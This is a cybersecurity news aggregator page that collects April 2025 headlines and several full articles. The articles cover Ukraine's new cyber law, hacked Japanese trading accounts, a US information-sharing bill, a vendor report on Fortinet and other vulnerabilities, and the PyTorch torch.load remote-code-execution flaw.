Security News
The latest news for cybersecurity collected from vast security websites.
2025-04-22 01:48:27
Whistleblower: DOGE Siphoned NLRB Case Data
A security architect with the National Labor Relations Board (NLRB) alleges that employees from Elon Musk's Department of Government Efficiency (DOGE) transferred gigabytes of sensitive data from agency case files in early March, using short-lived accounts configured to leave few traces of network activity. The NLRB whistleblower said the unusual large data outflows coincided with multiple blocked login attempts from an Internet address in Russia that tried to use valid credentials for a newly-created DOGE user account.
by Krebs on Security
2025-04-21 23:59:00
Last Week in Security (LWiS) - 2025-04-21
CVE drama (@MITREcorp), Control Flow Hijacking w/Data Pointers (@0xLegacyy), Copilot in notepad (@zux0x3a), .NET AOT in Ghidra (@washi_dev), CSWSH in 2025 (@IncludeSecurity), 300ms to Admin (@compasssecurity), and more!
by Bad Sector Labs
2025-04-21 22:12:00
Kimsuky Exploits BlueKeep RDP Vulnerability to Breach Systems in South Korea and Japan
Cybersecurity researchers have flagged a new malicious campaign related to the North Korean state-sponsored threat actor known as Kimsuky that exploits a now-patched vulnerability impacting Microsoft Remote Desktop Services to gain initial access. The activity has been named Larva-24005 by the AhnLab Security Intelligence Center (ASEC). "In some systems, initial access was gained through
by The Hacker News
2025-04-21 21:20:03
'Fog' Hackers Troll Victims With DOGE Ransom Notes
Since January, threat actors distributing the malware have notched up more than 100 victims.
by Dark Reading
2025-04-21 20:43:00
SuperCard X Android Malware Enables Contactless ATM and PoS Fraud via NFC Relay Attacks
A new Android malware-as-a-service (MaaS) platform named SuperCard X can facilitate near-field communication (NFC) relay attacks, enabling cybercriminals to conduct fraudulent cashouts. The active campaign is targeting customers of banking institutions and card issuers in Italy with an aim to compromise payment card data, fraud prevention firm Cleafy said in an analysis. There is evidence to
by The Hacker News
2025-04-21 20:42:28
Southeast Asian cyber fraud industry at ‘inflection point’ as it expands globally
Despite China- and Thailand-led crackdowns on scam compounds in Myanmar, the organized crime groups behind the cyber scam industry are growing increasingly professional and deepening ties with other regions and illicit actors.
by The Record
2025-04-21 20:40:39
'Elusive Comet' Attackers Use Zoom to Swindle Victims
The threat actor uses sophisticated social engineering techniques to infect a victim's device, either with an infostealer or remote access Trojan (RAT).
by Dark Reading
2025-04-21 20:40:08
Texas city takes systems offline after cyberattack
The city of Abilene disconnected servers after officials detected a cyber incident last week.
by The Record
2025-04-21 20:35:13
Agent In the Middle – Abusing Agent Cards in the Agent-2-Agent (A2A) Protocol To ‘Win’ All the Tasks
I think you’ll agree with me that growth in the AI landscape is pretty full-on at the moment. I go to sleep and wake up only to find more models have been released, each one outdoing the last one by several orders of magnitude, like some kind of Steve Jobs’ presentation on the latest product release, but on a daily loop.
by SpiderLabs Blog
2025-04-21 19:27:28
The best Bluetooth trackers of 2025: Expert tested
We've selected the top Bluetooth trackers, from AirTags to Tile, to help you keep track of your belongings, no matter if you're on iOS or Android.
by ZDNET Security
2025-04-21 19:12:50
Industry Moves for the week of April 21, 2025 - SecurityWeek
Explore industry moves and significant changes in the industry for the week of April 21, 2025. Stay updated with the latest industry trends and shifts.
by SecurityWeek
2025-04-21 19:12:44
Microsoft Purges Dormant Azure Tenants, Rotates Keys to Prevent Repeat Nation-State Hack
Microsoft security chief Charlie Bell says the SFI's 28 objectives are “near completion” and that 11 others have made “significant progress.”
by SecurityWeek
2025-04-21 19:07:57
Microsoft improving Secure By Design for its products and services
Microsoft said it's making strides in guarding its own systems against external threat actors.
by SC Media
2025-04-21 18:26:50
Update PyTorch ASAP | Kaspersky official blog
The CVE-2025-32434 vulnerability in PyTorch can lead to remote code execution (RCE). Update the PyTorch framework to version 2.6.0 ASAP.
by Kaspersky
2025-04-21 18:25:20
Kimsuky APT exploited BlueKeep RDP flaw in attacks against South Korea and Japan
Researchers spotted a new campaign by the North Korea-linked group Kimsuky, exploiting a patched Microsoft Remote Desktop Services flaw to gain initial access. While investigating a security breach, the AhnLab Security Intelligence Center (ASEC) researchers discovered a campaign by the North Korea-linked group Kimsuky, tracked as Larva-24005. Attackers exploited an RDP vulnerability to gain initial access to […]
by Security Affairs
2025-04-21 18:22:50
Nation-State Threats Put SMBs in Their Sights
Cyberthreat groups increasingly see small and medium-sized businesses, especially those with links to larger businesses, as the weak link in the supply chain for software and IT services.
by Dark Reading
2025-04-21 18:11:48
Zelenskyy Signs Law Advancing Cybersecurity of Ukraine’s State Networks and Critical Infrastructure

Ukrainian President Volodymyr Zelenskyy has signed a sweeping cybersecurity bill aimed at bolstering the protection of state networks and critical infrastructure amid an ongoing surge in cyberattacks linked to Russia. The newly ratified Law No. 4336-IX, titled “On Amendments to Certain Laws of Ukraine Regarding Information Protection and Cybersecurity of State Information Resources, Critical Information Infrastructure Objects,” introduces broad reforms to Ukraine’s national cyber strategy. It was approved by parliament on March 27 and signed into law last week.

With the war now deeply entrenched in both physical and digital domains, the law is designed to enhance Ukraine’s capacity to respond to threats targeting government systems and vital services. Officials said it marks a significant shift toward risk-based management, coordinated national response, and better information sharing.

“The implementation of this law will allow Ukraine to integrate even more effectively into the global cybersecurity ecosystem,” said Oleksandr Potii, head of Ukraine’s State Service of Special Communications and Information Protection. “Its adoption will contribute to increasing the resilience of Ukraine's digital systems against modern challenges.”

Ukraine Cybersecurity Bill: Coordinated Response, Crisis Activation, Information Sharing

One of the most impactful aspects of the legislation is the creation of a National Cyber Incident Response System. This framework defines the roles, responsibilities, and coordination mechanisms among state response teams and agencies. It also introduces a crisis response protocol, allowing the government to rapidly activate emergency measures when facing large-scale or nation-state cyberattacks.

To complement these efforts, the law mandates the creation of a Cyber Incident Information Exchange System. This platform will streamline how incidents are reported, managed, and disclosed across both public and private sectors, fostering early warning and faster remediation. The system’s design is informed by European Union practices and aims to minimize duplication and confusion in high-pressure scenarios.

Moving Beyond Legacy CIPS and Toward Lifecycle Risk Management

A major structural shift introduced by the law is the abandonment of the Comprehensive Information Protection System (CIPS), a framework that critics say had grown outdated and inflexible. In its place, Ukraine will adopt a modern risk management approach that emphasizes continuous security across the lifecycle of digital systems. Each system will now be subject to tailored protection profiles, with oversight mechanisms that stress agility over bureaucracy.

The legislation also provides for a cybersecurity assessment framework that includes periodic audits. Importantly, the government clarified that the audit process will avoid excessive interference, focusing instead on practical outcomes and organizational maturity.

Building Ukraine’s Cyber Workforce

To support implementation, the law requires the designation of dedicated cybersecurity officers within government ministries and critical infrastructure sectors. These roles are tasked with leading internal cyber policy, managing compliance, and interfacing with national authorities during incidents. The move signals Ukraine’s intent to professionalize its cybersecurity workforce and reduce fragmentation in how cyber defense is managed at the institutional level.

Aligned With European Norms

In addition to domestic reforms, the legislation also positions Ukraine to align more closely with EU cybersecurity directives, including requirements on:
- Cyber incident reporting
- Roles and mandates of national response teams
- Implementation of cybersecurity risk management in both public and private sectors

Ukrainian lawmakers framed the law as a vital step in harmonizing legal frameworks with European partners, paving the way for deeper integration into transnational cybersecurity cooperation.

Attacks Surge, Prompting Urgency

CERT-UA, the country’s national Computer Emergency Response Team, reported a 70% increase in cyber incidents in 2024 compared to the previous year. The rise includes espionage, infrastructure sabotage, and psychological warfare campaigns, many of them linked to Russia. As of early 2025, the upward trend shows no sign of slowing. In a public alert, CERT-UA said there is growing sophistication and persistence of attackers, especially those targeting telecommunications, energy, and military command systems.

Ukraine’s digital space is as much a frontline as the physical battlefield, said Potii. The country's defenses must evolve constantly to match the adversary.

Ukraine’s ability to operationalize the law’s provisions will depend on support from both domestic institutions and international partners. NATO allies and European cyber agencies are expected to play a role in technical assistance, as Ukraine seeks to reinforce its cyber posture not only for wartime resilience but long-term digital sovereignty. With this law, Ukraine joins a growing list of countries recognizing that modern cybersecurity policy must be proactive, deeply integrated, and strategically aligned across government and critical infrastructure sectors.
by The Cyber Express
2025-04-21 18:00:00
Meeting the 555 Benchmark
How long does it take your security teams to detect a potential threat, correlate relevant data, and initiate a response...
by Sysdig
2025-04-21 17:45:55
Booking.com Phishing Scam Uses Fake CAPTCHA to Install AsyncRAT
Fake Booking.com emails trick hotel staff into running AsyncRAT malware via fake CAPTCHA, targeting systems with remote access…
by Hackread
2025-04-21 17:35:25
Darktrace Recognized in the Gartner® Magic Quadrant™ for Email Security Platforms
Darktrace is proud to announce we’ve been recognized as a Challenger in our first appearance in the Gartner® Magic Quadrant™ for Email Security. In the report you’ll get key insights into the evolving email threat landscape, the requirements of a modern email security platform and the role of AI in advanced threat detection.
by Darktrace
2025-04-21 17:30:51
Fog ransomware notes troll with DOGE references, bait insider attacks
Recent Fog samples are spread through phishing emails referencing pay adjustments.
by SC Media
2025-04-21 17:30:32
Can Cybersecurity Weather the Current Economic Chaos?
Cybersecurity firms tend to be more software- and service-oriented than their peers, and threats tend to increase during a downturn, leaving analysts hopeful that the industry will buck a recession.
by Dark Reading
2025-04-21 17:05:00
Riding Smarter: A Guide to Bluetooth Motorcycle Intercoms
There’s nothing like the freedom of the open road when you’re on a motorcycle. But staying connected while…
by Hackread
2025-04-21 17:03:49
Japan Warns of Hacked Trading Accounts and Unauthorized Trades

Japan’s Financial Services Agency (FSA) warned last week of the growing threat of hacked trading accounts that has resulted in nearly US $700 million in unauthorized trades since March. The FSA documented a sharp increase in the number of such fraudulent trades, from 33 in February to 685 in March and 736 through the first 16 days of April. Accounts in at least six securities firms have been targeted in the attacks.

While the FSA cited stolen login information from “fake websites (phishing sites) disguised as websites of real securities companies,” a separate advisory from the Japan Securities Dealers Association (JSDA) also cited infostealer malware as a cause of some stolen credentials. The surge in compromised accounts has itself been used as a pretext for phishing attacks, JSDA said. “Taking advantage of this situation, we have also received many reports of emails being sent in the name of the Japan Securities Dealers Association or securities companies, warning people to be careful of phishing scams, with the aim of getting people to click on suspicious URLs,” the JSDA said.

Chinese Stocks Left in Hacked Trading Accounts

The number of unauthorized account accesses has also increased sharply in recent months, from 43 in February to 1,422 in March, and 1,847 through the first 16 days of April, for a three-month total of 3,312 compromised accounts, according to the FSA. In most cases, the FSA said “fraudsters gain unauthorized access to victim accounts and manipulate them to sell stocks etc. in the accounts, and use the proceeds to buy Chinese stocks etc. As a result of the fraudulent transactions, the Chinese stocks etc. remain in the victim accounts.” That suggests that share price manipulation could be one possible motive of the fraudulent transactions, to artificially move the share prices of Chinese stocks and other targeted securities that the fraudsters may have a position in.

While the FSA listed total sales (50.6 billion yen) and purchase amounts (44.8 billion yen) for the fraudulent trades over the last three months, the agency noted that those figures do not equate to investor losses from the scams, merely the total amount of the transactions.

Protecting Against Hacked Trading Accounts

The FSA and JSDA both issued steps investors should take to protect themselves from account hacks:
- Don’t open links contained in emails or texts “even if the sender looks familiar.”
- Bookmark the correct website URL for your securities company and access it only from the bookmark.
- Enable enhanced security features offered by securities companies such as multi-factor authentication and notification services when logging in, executing a trade, and withdrawing funds, and watch for suspicious transactions.
- Don’t reuse passwords, and don’t use simple passwords that are easy to guess. Combine numbers, uppercase and lowercase letters, and symbols.

The FSA urged account holders to check the status of their accounts frequently, “and if you suspect that you may have entered information on a suspicious website or are engaged in suspicious transactions, contact the inquiry desk of your securities company and change your passwords immediately.” Dark web monitoring is a good resource for discovering leaked account credentials, both for financial services companies and their customers.
by The Cyber Express
2025-04-21 17:00:00
The past, present, and future of enterprise AI - Pravi Devineni - ESW #403
by SC Media
2025-04-21 17:00:00
Tailscale rakes it in, CVE dead to us, cool Chrome extensions, dog saves toddler - ESW #403
by SC Media
2025-04-21 16:55:09
🐝 Hive Five 220 - The Post-Developer Era
Scarcity and Abundance in 2025, Nominative Determinism, Because Computers Are Stupid, NahamCon 2025, How To Get The Most Out of A Book, and more...
by Hive Five
2025-04-21 16:55:00
5 Reasons Device Management Isn't Device Trust
The problem is simple: all breaches start with initial access, and initial access comes down to two primary attack vectors – credentials and devices. This is not news; every report you can find on the threat landscape depicts the same picture. The solution is more complex. For this article, we’ll focus on the device threat vector. The risk they pose is significant, which is why device
by The Hacker News
2025-04-21 16:21:05
ASUS Urges Users to Patch AiCloud Router Vuln Immediately
The vulnerability is only found in the vendor's router series and can be triggered by an attacker using a crafted request — all of which helps make it a highly critical vulnerability with a 9.2 CVSS score.
by Dark Reading
2025-04-21 16:04:00
This ChatGPT trick can reveal where your photo was taken - and it's unsettling
ChatGPT can 'read' your photos for location clues - even without embedded GPS or EXIF data. Here's why that could be a problem.
by ZDNET Security
2025-04-21 15:45:18
Two top cyber officials resign from CISA
Bob Lord and Lauren Zabierek both posted on LinkedIn Monday morning that they were resigning from the Cybersecurity and Infrastructure Security Agency.
by The Record
2025-04-21 15:40:00
⚡ THN Weekly Recap: iOS Zero-Days, 4Chan Breach, NTLM Exploits, WhatsApp Spyware & More
Can a harmless click really lead to a full-blown cyberattack? Surprisingly, yes — and that’s exactly what we saw in last week’s activity. Hackers are getting better at hiding inside everyday actions: opening a file, running a project, or logging in like normal. No loud alerts. No obvious red flags. Just quiet entry through small gaps — like a misconfigured pipeline, a trusted browser feature,
by The Hacker News
2025-04-21 15:33:42
North Korean Cryptocurrency Thieves Caught Hijacking Zoom ‘Remote Control’ Feature
North Korean cryptocurrency thieves are abusing Zoom's remote collaboration feature to target cryptocurrency traders with malware.
by SecurityWeek
2025-04-21 15:25:07
Bulletproof hosting provider Proton66 steps up malware campaigns
Researchers advise security teams to block sources of bulletproof hosting.
by SC Media
2025-04-21 15:06:50
Native Language Phishing Spreads ResolverRAT to Healthcare
Morphisec discovers a new malware threat, ResolverRAT, that combines advanced methods for running code directly in computer memory,…
by Hackread
2025-04-21 14:33:00
I replaced my Ring with this outdoor security camera - and it has no subscription
The Aqara Camera Hub G5 Pro provides AI-powered visual recognition technology with a host of home security features. Best of all, it doesn't require a monthly subscription.
by ZDNET Security
2025-04-21 14:00:00
The Global AI Race: Balancing Innovation and Security
The AI security race is on — and it will be won where defenders come together with developers and researchers to do things right.
by Dark Reading
2025-04-21 13:53:29
Exaforce Banks Hefty $75 Million for AI-Powered SOC Remake
San Francisco startup closes a hefty $75 million Series A funding round led by Khosla Ventures and Mayfield.
by SecurityWeek
2025-04-21 13:50:00
What’s new in Sysdig — April 2025
Sysdig enters a major new chapter this month with full native support for Windows environments, a strategic unification of core...
by Sysdig
2025-04-21 13:25:36
Senators Peters and Rounds Lead Bipartisan Push to Extend Critical Cybersecurity Information Sharing Protections

U.S. Senators Gary Peters (D-MI) and Mike Rounds (R-SD) have introduced a bipartisan bill to extend vital provisions from the Cybersecurity Information Sharing Act of 2015. The new legislation, titled the Cybersecurity Information Sharing Extension Act, seeks to maintain and strengthen information-sharing mechanisms between the private sector and the federal government, particularly through the Department of Homeland Security (DHS).

The original Cybersecurity Information Sharing Act was enacted in 2015 to encourage businesses to voluntarily share cybersecurity threat indicators, such as software vulnerabilities, malware signatures, and malicious IP addresses, with the federal government. This collaborative model has been a cornerstone in protecting critical infrastructure and private data from a wide range of cyber threats, including attacks from nation-state actors and cybercriminals. With the original provisions set to expire, the Cybersecurity Information Sharing Extension Act would renew them for an additional ten years, preserving legal protections that have encouraged companies to share threat data without fear of legal or regulatory repercussions.

The Bipartisan Bill

“As cybersecurity threats grow increasingly sophisticated, information sharing is not just valuable—it remains essential for our national security,” said Senator Peters, who serves as the Ranking Member of the Homeland Security and Governmental Affairs Committee. “For the past ten years, these critical protections have helped to address rapidly evolving cybersecurity threats, and this bipartisan bill will renew them so we can continue this collaborative partnership between the private sector and government to bolster our nation’s cybersecurity defenses against a wide range of adversaries.”

Senator Rounds echoed these sentiments, emphasizing the necessity of maintaining these legal protections to ensure continued cooperation across the public and private sectors. “The Cybersecurity Information Sharing Act of 2015 has been instrumental in strengthening our nation’s cyber defenses by enabling critical information sharing between the private sector and government,” said Rounds. “Allowing this legislation to lapse would significantly weaken our cybersecurity ecosystem, removing vital liability protections and hampering defensive operations across both the defense industrial base and critical infrastructure sectors.”

Supporting Cybersecurity in the Region

Since its inception, the legislation has helped uncover and mitigate major cyber incidents, including the high-profile SolarWinds attack, as well as ongoing campaigns like Volt Typhoon and Salt Typhoon. These incidents demonstrated the need for rapid, coordinated responses, which were made possible through the sharing of actionable threat intelligence.

Moreover, the Department of Homeland Security (DHS), primarily through the Cybersecurity and Infrastructure Security Agency (CISA), has leveraged this shared information to support federal, state, and local agencies, as well as private companies across critical sectors. Through initiatives like the Joint Cyber Defense Collaborative and Information Sharing and Analysis Centers (ISACs), CISA ensures that threat alerts are disseminated widely to help communities and businesses preempt and respond to attacks.

Importantly, the legislation also includes strong privacy safeguards. It mandates that personally identifiable information (PII) be stripped from threat data before it is shared, ensuring that public safety does not come at the expense of individual privacy rights.

Senator Peters has been a longstanding advocate for improving cybersecurity preparedness. His legislative efforts have led to the enactment of several bipartisan bills aimed at enhancing cybersecurity support for K-12 schools, securing federal supply chains, strengthening the cybersecurity workforce, and improving protection for state and local governments. He also authored a landmark provision requiring critical infrastructure entities to report major cyber incidents or ransomware payments to CISA.

Conclusion

The reauthorization of the Cybersecurity Information Sharing Extension Act reflects a strong commitment to staying protected from threats by fostering ongoing collaboration between the government and the private sector. With cyberattacks growing more frequent and targeted, the legislation introduced by Senators Peters and Rounds takes a crucial step in reinforcing the nation's digital defenses. As the bill advances through Congress, it marks an important moment of bipartisan cooperation in cybersecurity, demonstrating that addressing cyber threats effectively requires a unified approach and sustained partnership between the public and private sectors.
by The Cyber Express
2025-04-21 13:00:00
Kenzo Security Raises $4.5 Million for Agentic AI Security Operations Platform
Kenzo Security has emerged from stealth mode after 18 months of developing its agentic AI security platform.
by SecurityWeek
2025-04-21 12:49:54
North Korea, Iran, Russia-Backed Hackers Deploy ClickFix in New Attacks
Government-backed hacking groups from North Korea (TA427), Iran (TA450), and Russia (UNK_RemoteRogue, TA422) are now using the ClickFix…
by Hackread
2025-04-21 12:33:13
IT Vulnerability Report: Fortinet Devices Vulnerable to Exploit

Overview

Cyble’s vulnerability intelligence unit examined 26 vulnerabilities and 14 dark web exploit claims in recent reports to clients and flagged 10 of the vulnerabilities as meriting high-priority attention by security teams. The vulnerabilities, which can lead to system compromise and data breaches, affect Fortinet products, WordPress plugins, Linux and Android systems, and more.

The Top IT Vulnerabilities

Here are some of the vulnerabilities highlighted by Cyble vulnerability intelligence researchers in recent reports.

CVE-2022-42475, CVE-2023-27997, and CVE-2024-21762 are critical vulnerabilities in Fortinet FortiGate devices that have been actively exploited to gain unauthorized remote access. CVE-2022-42475 is a heap-based buffer overflow vulnerability in the SSL-VPN component that allows remote code execution, while the other two enable initial access and privilege escalation. Recently, Fortinet revealed that attackers exploited these vulnerabilities to gain initial access and then used a novel post-exploitation technique to maintain persistent read-only access even after patches were applied. This technique involves creating a symbolic link (symlink) in the SSL-VPN language files folder that connects the user file system to the root file system, allowing attackers to evade detection and continue accessing device configurations.

CVE-2024-48887 is a critical unverified password change vulnerability in the Fortinet FortiSwitch GUI that could allow a remote, unauthenticated attacker to change administrator passwords without prior access by sending specially crafted HTTP requests to the set_password endpoint, which lacks proper input validation and authentication checks. This could enable the attacker to gain administrative privileges on the vulnerable FortiSwitch device, potentially allowing them to manipulate configurations or move laterally within internal networks.

Cyble’s ODIN vulnerability search tool has identified nearly 1 million potentially exposed Fortinet instances.

CVE-2025-3102 is a critical authentication bypass vulnerability in the SureTriggers: All-in-One Automation Platform plugin for WordPress, affecting versions up to and including 1.0.78. The flaw could allow unauthenticated attackers to create administrator accounts on websites where the plugin is installed and activated but not configured with an API key. The issue arises due to a missing empty value check on the 'secret_key' parameter in the plugin's authentication function, potentially enabling attackers to bypass authentication by sending an empty authorization header.

CVE-2024-53197 is a vulnerability in the Linux kernel's ALSA USB audio driver. It affects systems using USB audio devices, particularly Extigy and Mbox devices. The vulnerability involves potential out-of-bounds memory access that could occur when a malicious USB device provides an invalid bNumConfigurations value, potentially leading to system crashes or privilege escalation if an attacker has physical access to the system. Serbian authorities reportedly exploited the flaw to unlock confiscated Android devices as part of a zero-day exploit chain.

CVE-2025-31334 is a vulnerability affecting WinRAR, a popular file archiver utility for Windows, that could allow attackers to bypass the Windows "Mark of the Web" (MotW) security feature. This feature is designed to flag files downloaded from the internet as potentially unsafe and prompt users with a warning before executing them. Attackers could craft a malicious archive containing a symbolic link (symlink) pointing to an executable file. When opened using a vulnerable version of WinRAR, the MotW warning is bypassed, allowing the executable to run without user confirmation.

CVE-2025-30065 is a critical remote code execution (RCE) vulnerability in the Apache Parquet Java library, specifically affecting the parquet-avro module. Attackers could potentially create a malicious Parquet file that allows them to execute arbitrary code when imported into a vulnerable system. This typically requires social engineering tactics to convince users to open the malicious file. The vulnerability has a maximum CVSS score of 10.0, indicating high severity and ease of exploitation.

Vulnerabilities and Exploits on Underground Forums

Cyble researchers also observed multiple threat actors on dark web forums discussing exploits and weaponizing different vulnerabilities, including some claimed zero-day vulnerabilities. Some of the vulnerabilities under discussion include:
- CVE-2025-23120: A critical vulnerability in Veeam Backup & Replication that could allow an authenticated, remote attacker with valid domain privileges to execute code on the target system.
- CVE-2025-24071: A high-severity vulnerability in Microsoft Windows File Explorer that could allow unauthorized attackers to steal NTLM hashes without user interaction by exploiting the automatic processing of .library-ms files within RAR/ZIP archives. When such a file containing a malicious SMB path is extracted, Windows Explorer triggers an SMB authentication request, leading to the disclosure of the user's NTLM hash.
- CVE-2025-22457: A critical stack-based buffer overflow vulnerability affecting multiple Ivanti products, including Ivanti Connect Secure, Policy Secure, and ZTA Gateways, that could allow remote, unauthenticated attackers to execute arbitrary code on vulnerable devices, leading to remote code execution (RCE).
- CVE-2025-2005: A vulnerability affecting the Front-End Users plugin for WordPress that allows unauthenticated arbitrary file uploads, which attackers could exploit to upload malicious files, potentially leading to code execution or other security breaches on affected websites.

Cyble Recommendations

To protect against vulnerabilities and exploits, Cyble recommends that organizations implement the following best practices:
- Regularly update all software and hardware systems with the latest patches from official vendors.
- Develop a comprehensive patch management strategy that includes inventory management, patch assessment, testing, deployment, and verification. Automate the process where possible to ensure consistency and efficiency.
- Divide your network into distinct segments to isolate critical assets from less secure areas. Use firewalls, VLANs, and access controls to limit access and reduce the attack surface exposed to potential threats.
- Create and maintain an incident response plan that outlines procedures for detecting, responding to, and recovering from security incidents, including ransomware-resistant backups. Regularly test and update the plan to ensure its effectiveness and alignment with current threats.
- Implement comprehensive monitoring and logging solutions to detect and analyze suspicious activities. Use SIEM (Security Information and Event Management) systems to aggregate and correlate logs for real-time threat detection and response.
- Subscribe to security advisories and alerts from official vendors, CERTs, and other authoritative sources. Regularly review and assess the impact of these alerts on your systems and take appropriate actions.
- Conduct regular vulnerability assessment and penetration testing (VAPT) exercises to identify and remediate system vulnerabilities. Complement these exercises with periodic security audits to ensure compliance with security policies and standards.

Conclusion

Security teams should prioritize actively exploited vulnerabilities, and those at high risk of exploitation, when determining their patching efforts. They should also consider other indicators of risk, such as web exposure, data, and application sensitivity. Implementing strong security practices is essential for protecting sensitive data and maintaining system integrity. A comprehensive attack surface management solution like Cyble can monitor for threats, vulnerabilities, and leaks specific to your environment, helping you harden cyber defenses and respond quickly to events before they become bigger incidents.
by CYBLE
2025-04-21 12:31:00
Hackers Abuse Russian Bulletproof Host Proton66 for Global Attacks and Malware Delivery
Cybersecurity researchers have disclosed a surge in "mass scanning, credential brute-forcing, and exploitation attempts" originating from IP addresses associated with a Russian bulletproof hosting service provider named Proton66. The activity, detected since January 8, 2025, targeted organizations worldwide, according to a two-part analysis published by Trustwave SpiderLabs last week. "Net
by The Hacker News
2025-04-21 12:26:19
Microsoft Entra account lockouts caused by user token logging mishap
Microsoft confirms that the weekend Entra account lockouts were caused by the invalidation of short-lived user refresh tokens that were mistakenly logged into internal systems. [...]
by BleepingComputer
2025-04-21 12:26:00
Researchers warn of critical flaw found in Erlang OTP SSH
The CVE could allow unauthenticated attackers to gain full access to a device. Many of these devices are widely used in IoT and telecom platforms.
by Cybersecurity Dive
2025-04-21 12:25:45
Bot Traffic Surpasses Humans Online—Driven by AI and Criminal Innovation
With 51% of internet traffic now bot-driven and a growing share of it malicious, organizations must prepare for an era of more evasive, AI-assisted automation. The post Bot Traffic Surpasses Humans Online—Driven by AI and Criminal Innovation appeared first on SecurityWeek.
by SecurityWeek
2025-04-21 12:06:34
Job Offers Turned Attack Vectors: Inside Lazarus' “ClickFake” Campaign
Welcome to Picus Security's monthly cyber threat intelligence roundup!
by Picus Security
2025-04-21 12:06:06
Industry First: StrikeReady AI Platform Moves Security Teams Beyond Basic, One-Dimensional AI-Driven Triage Solutions
Dallas, United States, TX, 21st April 2025, CyberNewsWire
by Hackread
2025-04-21 12:00:51
Lumma Stealer – Tracking distribution channels
During incident response activities, our GERT team discovered Lumma Stealer in a customer’s infrastructure. Our experts conducted an investigation and analyzed its distribution scheme in detail.
by Securelist
2025-04-21 12:00:02
Why Asset Visibility and Signature-Based Threat Detection Fall Short in ICS Security
Discover how anomaly detection deployed across core network segments delivers a more effective approach to ICS security.
by Darktrace
2025-04-21 12:00:00
Motorola Solutions to outfit first responders with new AI-enabled body cameras
Unveiled today, AI Assist aims to help public safety officers do their jobs more efficiently - and safely. Here's how it works.
by ZDNET Security
2025-04-21 11:58:29
Japan warns of hundreds of millions of dollars in unauthorized trades from hacked accounts
Japanese regulators published an urgent warning about hundreds of millions of dollars worth of unauthorized trades being conducted on hacked brokerage accounts in the country.
by The Record
2025-04-21 11:38:03
FOG Ransomware Impersonates U.S. DOGE to Infect Targets
Cybercriminals are distributing FOG ransomware through phishing emails that spoof ties to the U.S. Department of Government Efficiency (DOGE), embedding politically themed messages and exploiting old vulnerabilities to compromise victims across multiple sectors. The campaign was uncovered by Trend Micro researchers during their analysis of nine malware samples uploaded to VirusTotal between March 27 and … The post FOG Ransomware Impersonates U.S. DOGE to Infect Targets appeared first on CyberInsider.
by Cyber Insider
2025-04-21 11:24:21
Google Exploit Bypasses DKIM Protections to Deliver Realistic Alerts
A security researcher has uncovered a high-impact phishing campaign exploiting multiple vulnerabilities in Google's infrastructure, enabling attackers to send alarmingly realistic emails from legitimate Google domains. The campaign, initially dismissed by Google as “working as intended,” combines weaknesses in Google Sites and OAuth notifications to craft phishing messages that bypass standard security checks and appear … The post Google Exploit Bypasses DKIM Protections to Deliver Realistic Alerts appeared first on CyberInsider.
by Cyber Insider
2025-04-21 11:12:55
Countries Shore Up Their Digital Defenses as Global Tensions Raise the Threat of Cyberwarfare
Countries around the world are preparing for greater digital conflict as increasing global tensions and a looming trade war have raised the stakes. The post Countries Shore Up Their Digital Defenses as Global Tensions Raise the Threat of Cyberwarfare appeared first on SecurityWeek.
by SecurityWeek
2025-04-21 11:05:52
Gartner: How to build a secure enterprise cloud environment
There are plenty of frameworks, tools and strategies to help map out a risk-resilient cloud infrastructure.
by Cybersecurity Dive
2025-04-21 11:05:00
Microsoft strengthens in-house cyber governance, training
The technology giant, as part of its Secure Future Initiative program, has overhauled security practices following a series of crippling nation-state-linked cyberattacks.
by Cybersecurity Dive
2025-04-21 10:45:19
21st April – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 21st April, please download our Threat Intelligence Bulletin. TOP ATTACKS AND BREACHES Retail giant Ahold Delhaize has suffered a cyber-attack resulting in data theft of customer information from its US business systems. The attack, claimed by ransomware group INC Ransom, impacted Ahold Delhaize USA […] The post 21st April – Threat Intelligence Report appeared first on Check Point Research.
by Check Point Research
2025-04-21 10:30:00
How to Protect Yourself From Phone Searches at the US Border
Customs and Border Protection has broad authority to search travelers’ devices when they cross into the United States. Here’s what you can do to protect your digital life while at the US border.
by WIRED Security News
2025-04-21 10:25:09
Hackers Can Now Exploit AI Models via PyTorch – Critical Bug Found
A major security flaw has been discovered in PyTorch, the widely used open-source machine learning framework. Identified as CVE-2025-32434, this newly reported PyTorch vulnerability allows attackers to remotely execute arbitrary code on systems that load AI models, even when protective settings like weights_only=True are enabled. This critical vulnerability impacts all PyTorch versions up to and including 2.5.1, according to a security advisory published earlier this week. The issue has been addressed in version 2.6.0, which has been made available through pip.

PyTorch Vulnerability Details

The root of the issue lies within PyTorch’s torch.load() function, a core component frequently used for loading serialized models. For years, developers have relied on the weights_only=True flag to protect against potentially harmful code embedded in model files. However, that protection has now been proven insufficient. Security researcher Ji’an Zhou demonstrated that the weights_only=True setting can be bypassed, enabling attackers to execute remote commands. This revelation directly contradicts PyTorch's own documentation, which previously recommended the setting as a reliable mitigation method. "This issue highlights the evolving nature of ML security," the PyTorch team stated. "We urge all users to update immediately and report suspicious model behavior."

Who Is at Risk?

Any application, research tool, or cloud service that relies on torch.load() using unpatched PyTorch versions is vulnerable. This includes systems designed for inference, federated learning, and model hub integrations. An attacker could easily upload a tampered model to a public repository or inject it into a software supply chain. When a user loads the compromised model, the exploit would trigger, potentially granting full control over the target system.

Given the low complexity and high impact of the attack, security experts have classified the vulnerability as critical. According to GitHub's CVE record, CVE-2025-32434 carries a CVSS 4.0 score of 9.3, placing it firmly in the “Critical” category. The vector string highlights its severity:

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

In simpler terms, it requires no special privileges, user interaction, or advanced exploitation techniques, making it especially dangerous for real-world applications.

Immediate Actions Recommended

The PyTorch team strongly urges all users to take the following steps:

Upgrade to PyTorch 2.6.0 immediately using pip install --upgrade torch.
Audit existing AI models, especially those sourced from third-party or public repositories.
Monitor official security channels, including the PyTorch GitHub Security page and the related GitHub Advisory (GHSA-53q9-r3pm-6pq6), for updates.

Conclusion

The discovery of the CVE-2025-32434 PyTorch vulnerability highlights the gaps in the AI community. Even widely trusted machine learning frameworks are not immune to serious security flaws. This critical vulnerability, which affects all PyTorch versions up to 2.5.1, allows remote code execution, even with weights_only=True enabled. To protect systems, users must immediately upgrade to PyTorch 2.6.0, audit existing models—especially those from third-party sources—and closely monitor official security channels.
by The Cyber Express
2025-04-21 10:00:56
False Face: Unit 42 Demonstrates the Alarming Ease of Synthetic Identity Creation
